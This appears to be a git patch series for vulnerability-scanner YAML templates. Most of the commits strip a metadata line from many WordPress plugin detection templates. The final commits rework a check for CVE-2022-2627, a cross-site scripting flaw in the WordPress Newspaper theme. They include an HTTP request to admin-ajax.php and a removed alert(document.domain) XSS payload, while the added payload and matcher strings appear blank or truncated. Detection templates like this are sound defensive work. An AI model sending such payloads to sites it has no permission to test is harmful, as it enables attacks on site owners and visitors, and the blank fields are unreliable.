b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87721a245a..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 45e0dead0e..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aa1898c4ba..48ffb25245 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index fba45020e4..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From b049cda79e8cf1f32fd0a862b902a0e96bbe699e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 1 Sep 2023 14:04:34 +0530 Subject: [PATCH 0059/1090] misc update --- http/cves/2022/CVE-2022-2627.yaml | 23 +++++++++++------------ 1 file changed, 11 insertions(+), 12 deletions(-) diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 0485651b64..cde3093c96 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -1,8 +1,8 @@ id: CVE-2022-2627 info: - name: WordPress Newspaper <12 - Cross-Site Scripting - author: ramondunker + name: WordPress Newspaper < 12 - Cross-Site Scripting + author: ramondunker,c4sper0 severity: medium description: | WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. @@ -26,26 +26,25 @@ info: http: - raw: - | - POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/2 + POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1 Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - action=td_ajax_search&td_string=tej2j1q%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3emvufr + action=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]= + + payloads: + xss_payload: + - "
" matchers-condition: and matchers: - type: word part: body words: - - '
' - - '/newspaper' - case-insensitive: true + -
+ - td-block- condition: and - - type: word - part: header - words: - - text/html - - type: status status: - 200 From 0fdde48ab486774e5c3a62ffae16cdeb1b3e8ff4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 1 Sep 2023 14:25:18 +0530 Subject: [PATCH 0060/1090] updated matcher|metadata --- http/cves/2022/CVE-2022-2627.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index cde3093c96..f4d9a59974 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -6,6 +6,7 @@ info: severity: medium description: | WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. + remediation: Fixed in version 12 reference: - https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea - https://nvd.nist.gov/vuln/detail/CVE-2022-2627 @@ -18,6 +19,8 @@ info: cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + verified: true + publicwww-query: "/wp-content/themes/Newspaper" framework: wordpress vendor: tagdiv product: newspaper @@ -45,6 +48,11 @@ http: - td-block- condition: and + - type: word + part: header + words: + - text/html + - type: status status: - 200 From 6c6197068cfb4ca0948e0c25e88a9d1626a119b7 Mon Sep 17 00:00:00 2001 From: 